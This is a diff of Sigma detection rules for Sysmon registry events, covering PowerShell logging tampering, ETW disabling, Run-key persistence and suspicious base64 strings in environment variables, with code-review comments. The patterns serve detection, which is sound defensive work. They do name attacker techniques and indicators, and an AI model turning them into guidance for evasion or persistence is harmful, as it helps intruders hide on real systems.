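Review bot: The three comment lines added under `TargetObject|endswith` in the `@@ -27,12 +26,16 @@` hunk record a real coverage gap (PowerShell 7 keeps its execution policy in powershell.config.json, which a registry_set rule never sees), but that limitation is only visible to someone reading the YAML; the rule's `description` still reads as if it covers all PowerShell execution-policy changes. Suggest surfacing it where consumers see it, e.g. appending to `description`: `Note: PowerShell 7+ stores its execution policy in powershell.config.json and is not covered by this registry-based rule.` The new `# Note: We filter out "svchost" …` comment on `filter_main_svchost` describes a svchost-only exclusion, while the visible part of the filter is an `Image|contains` on `:\Windows\System32\` and `:\Windows\SysWOW64\`; the rest of the filter lies outside the hunk, so I cannot confirm it is narrowed to svchost.exe rather than any image under those directories.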
diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml
index 2ac945a74..f0296afa8 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml
@@ -20,7 +20,7 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Run
+ TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Run # Also covers "RunOnce" and "RunOnceEx"
 Details|contains:
 - powershell
 - 'pwsh '
diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml
index 597e503e0..5e6e27153 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml
@@ -1,9 +1,7 @@
 title: PowerShell Logging Disabled Via Registry Key Tampering
 id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7
 status: experimental
-description: Detects changes to the registry for the currently logged-in user. In
- order to disable PowerShell module logging, script block logging or transcription
- and script execution logging
+description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled
 author: frack113
@@ -22,8 +20,8 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 TargetObject|contains:
- - \Microsoft\Windows\PowerShell\
- - \Microsoft\PowerShellCore\
+ - \Microsoft\Windows\PowerShell\ # PowerShell 5
+ - \Microsoft\PowerShellCore\ # PowerShell 7
 TargetObject|endswith:
 - \ModuleLogging\EnableModuleLogging
 - \ScriptBlockLogging\EnableScriptBlockLogging
diff --git a/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml b/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml
index 418887a12..9fe54b93d 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml
@@ -1,15 +1,14 @@
 title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
 id: 7021255e-5db3-4946-a8b9-0ba7a4644a69
 related:
- - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c
- type: similar
- - id: f9999590-1f94-4a34-a91e-951e47bedefd
- type: similar
- - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25
- type: similar
+ - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic
+ type: similar
+ - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse
+ type: similar
+ - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry
+ type: similar
 status: experimental
-description: Detects potential abuse of the provisioning registry key for indirect
- command execution through "Provlaunch.exe".
+description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
 - https://twitter.com/0gtweet/status/1674399582162153472
@@ -23,8 +22,7 @@ tags:
 logsource:
 category: registry_set
 product: windows
- definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\"
- and its subkey must be monitored'
+ definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" and its subkey must be monitored'
 detection:
 registry_set:
 EventID: 13
diff --git a/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
index fee08a52f..f90d6b8b5 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
@@ -1,13 +1,12 @@
 title: Usage of Renamed Sysinternals Tools - RegistrySet
 id: 8023f872-3f1d-4301-a384-801889917ab4
 related:
- - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
- type: derived
- - id: f50f3c09-557d-492d-81db-9064a8d4e211
- type: similar
+ - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
+ type: derived
+ - id: f50f3c09-557d-492d-81db-9064a8d4e211
+ type: similar
 status: experimental
-description: Detects non-sysinternals tools setting the "accepteula" key which normally
- is set on sysinternals tool execution
+description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
 references:
 - Internal Research
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -54,9 +53,8 @@ detection:
 - \ADExplorer.exe
 - \ADExplorer64.exe
 filter_optional_null:
- Image: null
- condition: registry_set and (selection and not 1 of filter_main_* and not 1 of
- filter_optional_*)
+ Image: # Race condition with some logging tools
+ condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Unlikely
 level: high
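Review bot: The `filter_optional_null` entry drops the explicit `null` and now relies on a bare `Image:` being parsed as a YAML null, which reads like an unfinished key rather than a deliberate match on an absent field; the filter behaves the same, but the intent is clearer if the value stays explicit: `Image: null # Race condition with some logging tools`. The `condition` line in the same hunk is unchanged apart from the reflow, so the only new semantics to check is this null-match.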
diff --git a/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
index 2868b9b28..92488ce5c 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
@@ -1,8 +1,7 @@
 title: ETW Logging Disabled For rpcrt4.dll
 id: 90f342e1-1aaa-4e43-b092-39fda57ed11e
 status: experimental
-description: Detects changes to the "ExtErrorInformation" key in order to disable
- ETW logging for rpcrt4.dll
+description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
 references:
 - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -23,8 +22,9 @@ detection:
 selection:
 TargetObject|endswith: \Microsoft\Windows NT\Rpc\ExtErrorInformation
 Details:
- - DWORD (0x00000000)
- - DWORD (0x00000002)
+ # This is disabled by default for some reason
+ - DWORD (0x00000000) # Off
+ - DWORD (0x00000002) # Off with exceptions
 condition: registry_set and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml b/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
index e3b53d82a..5e850dda7 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
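Review bot: The new comment `# This is disabled by default for some reason` records that the matched values 0 and 2 are the default state, yet `falsepositives` in the same hunk still says `- Unknown`; if that default is re-applied by policy or an installer the rule fires on benign activity, and YAML comments are stripped when the rule is converted for a backend, so the knowledge never reaches the analyst. Suggest carrying it into the rule body, e.g. `- Re-application of the default value (0x0 or 0x2) by policy or software installers`. The same pattern recurs in later hunks: the SCM `TracingDisabled` comment that the value is 1 by default next to `falsepositives: Unknown`, the SIP-provider `filter` comment to add environment-specific providers, the `Image|endswith` comment in the suspicious-service `filter`, and the `# can use Details|contains` tuning hint in the user-shell-folders rule; each of these belongs in `falsepositives` or `description` rather than in a comment.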
@@ -1,8 +1,7 @@
 title: ScreenSaver Registry Key Set
 id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce
 status: experimental
-description: Detects registry key established after masqueraded .scr file execution
- using Rundll32 through desk.cpl
+description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
 references:
 - https://twitter.com/VakninHai/status/1517027824984547329
 - https://twitter.com/pabraeken/status/998627081360695297
diff --git a/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml b/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml
index d84a79aa9..ff4ebad09 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml
@@ -1,8 +1,7 @@
 title: ServiceDll Hijack
 id: 612e47e9-8a59-43a6-b404-f48683f45bd6
 status: experimental
-description: Detects changes to the "ServiceDLL" value related to a service in the
- registry. This is often used as a method of persistence.
+description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time
 - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml
index 2700cfd85..f541d98e0 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml
@@ -1,8 +1,7 @@
 title: ETW Logging Disabled For SCM
 id: 4f281b83-0200-4b34-bf35-d24687ea57c2
 status: experimental
-description: Detects changes to the "TracingDisabled" key in order to disable ETW
- logging for services.exe (SCM)
+description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
 references:
 - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -22,7 +21,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 TargetObject|endswith: Software\Microsoft\Windows NT\CurrentVersion\Tracing\SCM\Regular\TracingDisabled
- Details: DWORD (0x00000001)
+ Details: DWORD (0x00000001) # Funny (sad) enough, this value is by default 1.
 condition: registry_set and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml b/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml
index b2294fe45..20beca79c 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml
@@ -1,8 +1,7 @@
 title: Registry Explorer Policy Modification
 id: 1c3121ed-041b-4d97-a075-07f54f20fb4a
 status: test
-description: Detects registry modifications that disable internal tools or functions
- in explorer (malware like Agent Tesla uses this technique)
+description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md
 author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml
index f9dccbe0a..2556e07da 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_sip_persistence.yml
@@ -1,8 +1,7 @@
 title: Persistence Via New SIP Provider
 id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1
 status: experimental
-description: Detects when an attacker register a new SIP provider for persistence
- and defense evasion
+description: Detects when an attacker register a new SIP provider for persistence and defense evasion
 references:
 - https://persistence-info.github.io/Data/codesigning.html
 - https://github.com/gtworek/PSBits/tree/master/SIP
@@ -34,6 +33,7 @@ detection:
 - \$DLL
 filter:
 Details:
+ # Add more legitimate SIP providers according to your env
 - WINTRUST.DLL
 - mso.dll
 filter_poqexec:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml
index 9e99d1674..037e12023 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml
@@ -26,7 +26,6 @@ detection:
 Details: DWORD (0x00000000)
 condition: registry_set and selection
 falsepositives:
- - Some FP may occur when the feature is disabled by the AV itself, you should
- always investigate if the action was legitimate
+ - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml b/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml
index a937d23f8..5e223457d 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_special_accounts.yml
@@ -1,12 +1,10 @@
 title: Hiding User Account Via SpecialAccounts Registry Key
 id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd
 related:
- - id: 8a58209c-7ae6-4027-afb0-307a78e4589a
- type: obsoletes
+ - id: 8a58209c-7ae6-4027-afb0-307a78e4589a
+ type: obsoletes
 status: test
-description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows
- NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to
- "0" in order to hide user account from being listed on the logon screen.
+description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
@@ -25,7 +23,7 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- EventType: SetValue
+ EventType: SetValue
 TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
 Details: DWORD (0x00000000)
 condition: registry_set and selection
diff --git a/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml b/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml
index 6c0457709..b49042676 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml
@@ -1,8 +1,7 @@
 title: Activate Suppression of Windows Security Center Notifications
 id: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63
 status: experimental
-description: Detect set Notification_Suppress to 1 to disable the Windows security
- center notification
+description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
 author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
index 744fd55fd..f321d76b6 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
@@ -1,9 +1,7 @@
 title: Suspicious Keyboard Layout Load
 id: 34aa0252-6039-40ff-951f-939fd6ce47d8
 status: test
-description: Detects the keyboard preload installation with a suspicious keyboard
- layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems
- maintained by US staff only
+description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
 references:
 - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
 - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
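Review bot: The reflowed `description` of the keyboard-layout rule still lists Chinese layouts among the examples, but the `Details|contains` list in the next hunk of this file carries only the two Persian identifiers and the Vietnamese identifier that the new comments annotate, so the description promises coverage the detection does not have. Either drop `Chinese` from the sentence or add the corresponding layout identifiers to the list and comment them the same way. Keeping the description aligned with the list matters here because the annotations in the next hunk are the only place the identifiers are explained, and they are comments that do not survive conversion.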
@@ -17,8 +15,7 @@ tags:
 logsource:
 category: registry_set
 product: windows
- definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload
- subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
+ definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
 detection:
 registry_set:
 EventID: 13
@@ -28,12 +25,11 @@ detection:
 - \Keyboard Layout\Preload\
 - \Keyboard Layout\Substitutes\
 Details|contains:
- - 00000429
- - 00050429
- - 0000042a
+ - 00000429 # Persian (Iran)
+ - 00050429 # Persian (Iran)
+ - 0000042a # Vietnamese
 condition: registry_set and selection_registry
 falsepositives:
- - Administrators or users that actually use the selected keyboard layouts (heavily
- depends on the organisation's user base)
+ - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml
index 5029cc3c5..6cc7dbd26 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml
@@ -1,9 +1,7 @@
 title: Potential PendingFileRenameOperations Tamper
 id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a
 status: test
-description: Detect changes to the "PendingFileRenameOperations" registry key from
- uncommon or suspicious images lcoations to stage currently used files for rename
- after reboot.
+description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.
 references:
 - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6
 - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/
@@ -24,7 +22,7 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_main:
- EventType: SetValue
+ EventType: SetValue
 TargetObject|contains: \CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
 selection_susp_paths:
 Image|contains:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml
index 8eefa93ae..300366432 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml
@@ -1,8 +1,7 @@
 title: Suspicious Printer Driver Empty Manufacturer
 id: e0813366-0407-449a-9869-a2db1119dc41
 status: test
-description: Detects a suspicious printer driver installation with an empty Manufacturer
- value
+description: Detects a suspicious printer driver installation with an empty Manufacturer value
 references:
 - https://twitter.com/SBousseaden/status/1410545674773467140
 author: Florian Roth (Nextron Systems)
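Review bot: The rewritten `description` of the PendingFileRenameOperations rule carries the typos `images lcoations` forward into the new single line; since the line is replaced anyway it should read `description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename after reboot.` The second hunk of the same file only re-indents `EventType: SetValue` and needs no change.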
@@ -35,7 +34,6 @@ detection:
 TargetObject|contains: \Version-3\PDF24\
 condition: registry_set and (selection and not 1 of filter_*)
 falsepositives:
- - Alerts on legitimate printer drivers that do not set any more details in the
- Manufacturer value
+ - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
index 19bee4c54..7fbe21945 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
@@ -1,8 +1,7 @@
 title: Registry Persistence via Explorer Run Key
 id: b7916c2a-fa2f-4795-9477-32b731f70f11
 status: test
-description: Detects a possible persistence mechanism using RUN key for Windows Explorer
- and pointing to a suspicious folder
+description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
 references:
 - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
 author: Florian Roth (Nextron Systems), oscd.community
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml
index 2a1fc6e13..51b3e44c0 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml
@@ -1,8 +1,7 @@
 title: New RUN Key Pointing to Suspicious Folder
 id: 02ee49e2-e294-4d0f-9278-f5b3212fc588
 status: experimental
-description: Detects suspicious new RUN key element pointing to an executable in a
- suspicious folder
+description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
 references:
 - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
 author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
@@ -24,20 +23,20 @@ detection:
 - \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
 - \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\
 selection_details:
- - Details|contains:
- - :\$Recycle.bin\
- - :\Temp\
- - :\Users\Default\
- - :\Users\Desktop\
- - :\Users\Public\
- - :\Windows\Temp\
- - \AppData\Local\Temp\
- - '%temp%\'
- - '%tmp%\'
- - Details|startswith:
- - '%Public%\'
- - wscript
- - cscript
+ - Details|contains:
+ - :\$Recycle.bin\
+ - :\Temp\
+ - :\Users\Default\
+ - :\Users\Desktop\
+ - :\Users\Public\
+ - :\Windows\Temp\
+ - \AppData\Local\Temp\
+ - '%temp%\'
+ - '%tmp%\'
+ - Details|startswith:
+ - '%Public%\'
+ - wscript
+ - cscript
 condition: registry_set and (all of selection_*)
 fields:
 - Image
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml
index 3748e354b..98e00a796 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_service_installed.yml
@@ -1,13 +1,9 @@
 title: Suspicious Service Installed
 id: f2485272-a156-4773-82d7-1d178bc4905b
 status: test
-description: 'Detects installation of NalDrv or PROCEXP152 services via registry-keys
- to non-system32 folders.
-
- Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs),
- which uses KDU (https://github.com/hfiref0x/KDU)
-
- '
+description: |
+ Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
+ Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
 references:
 - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
 author: xknow (@xknow_infosec), xorxes (@xor_xes)
@@ -30,6 +26,7 @@ detection:
 - HKLM\System\CurrentControlSet\Services\PROCEXP152\ImagePath
 filter:
 Image|endswith:
+ # Please add the full paths that you use in your environment to tighten the rule
 - \procexp64.exe
 - \procexp.exe
 - \procmon64.exe
@@ -39,8 +36,6 @@ detection:
 Details|contains: \WINDOWS\system32\Drivers\PROCEXP152.SYS
 condition: registry_set and (selection and not filter)
 falsepositives:
- - Other legimate tools using this service names and drivers. Note - clever attackers
- may easily bypass this detection by just renaming the services. Therefore
- just Medium-level and don't rely on it.
+ - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml b/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml
index b185dc86d..e3dab9f31 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml
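Review bot: The joined `falsepositives` entry in the last hunk of this file keeps the misspelling `legimate` and the number disagreement `this service names`; as the line is rewritten here it should read `- Other legitimate tools using these service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.` The sentence also already states that the rule is trivially evaded by renaming, which is the kind of caveat worth keeping in the rule body rather than only in comments such as the new `# Please add the full paths` line in the `filter` hunk above it.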
+++ b/sigma/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml
@@ -1,8 +1,7 @@
 title: Modify User Shell Folders Startup Value
 id: 9c226817-8dc9-46c2-a58d-66655aafd7dc
 status: experimental
-description: Detect modification of the startup key to a path where a payload could
- be stored to be launched during startup
+description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md
 author: frack113
@@ -21,9 +20,9 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- TargetObject|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User
- Shell Folders
- TargetObject|endswith: Startup
+ TargetObject|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
+ TargetObject|endswith: Startup # cover Common Startup and Startup
+ # can use Details|contains: path if get too many FP
 condition: registry_set and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml b/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml
index c4f24ab37..ac37bd337 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml
@@ -1,8 +1,7 @@
 title: Suspicious Environment Variable Has Been Registered
 id: 966315ef-c5e1-4767-ba25-fce9c8de3660
 status: test
-description: Detects the creation of user-specific or system-wide environment variables
- via the registry. Which contains suspicious commands and strings
+description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
 references:
 - https://infosec.exchange/@sbousseaden/109542254124022664
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -22,39 +21,43 @@ detection:
 selection_main:
 TargetObject|contains: \Environment\
 selection_details:
- - Details:
- - powershell
- - pwsh
- - Details|contains:
- - \AppData\Local\Temp\
- - C:\Users\Public\
- - TVqQAAMAAAAEAAAA
- - TVpQAAIAAAAEAA8A
- - TVqAAAEAAAAEABAA
- - TVoAAAAAAAAAAAAA
- - TVpTAQEAAAAEAAAA
- - SW52b2tlL
- - ludm9rZS
- - JbnZva2Ut
- - SQBuAHYAbwBrAGUALQ
- - kAbgB2AG8AawBlAC0A
- - JAG4AdgBvAGsAZQAtA
- - Details|startswith:
- - SUVY
- - SQBFAF
- - SQBuAH
- - cwBhA
- - aWV4
- - aQBlA
- - R2V0
- - dmFy
- - dgBhA
- - dXNpbm
- - H4sIA
- - Y21k
- - cABhAH
- - Qzpc
- - Yzpc
+ - Details:
+ - powershell
+ - pwsh
+ - Details|contains:
+ # Add more suspicious strings in env variables below
+ - \AppData\Local\Temp\
+ - C:\Users\Public\
+ # Base64 MZ Header
+ - TVqQAAMAAAAEAAAA # MZ..........
+ - TVpQAAIAAAAEAA8A
+ - TVqAAAEAAAAEABAA
+ - TVoAAAAAAAAAAAAA
+ - TVpTAQEAAAAEAAAA
+ # Base64 Invoke- (UTF-8)
+ - SW52b2tlL
+ - ludm9rZS
+ - JbnZva2Ut
+ # Base64 Invoke- (UTF-16LE)
+ - SQBuAHYAbwBrAGUALQ
+ - kAbgB2AG8AawBlAC0A
+ - JAG4AdgBvAGsAZQAtA
+ - Details|startswith: # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
+ - SUVY
+ - SQBFAF
+ - SQBuAH
+ - cwBhA
+ - aWV4
+ - aQBlA
+ - R2V0
+ - dmFy
+ - dgBhA
+ - dXNpbm
+ - H4sIA
+ - Y21k
+ - cABhAH
+ - Qzpc
+ - Yzpc
 condition: registry_set and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml b/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml
index c17144392..8560ae7eb 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml
@@ -1,16 +1,12 @@
 title: Enable LM Hash Storage
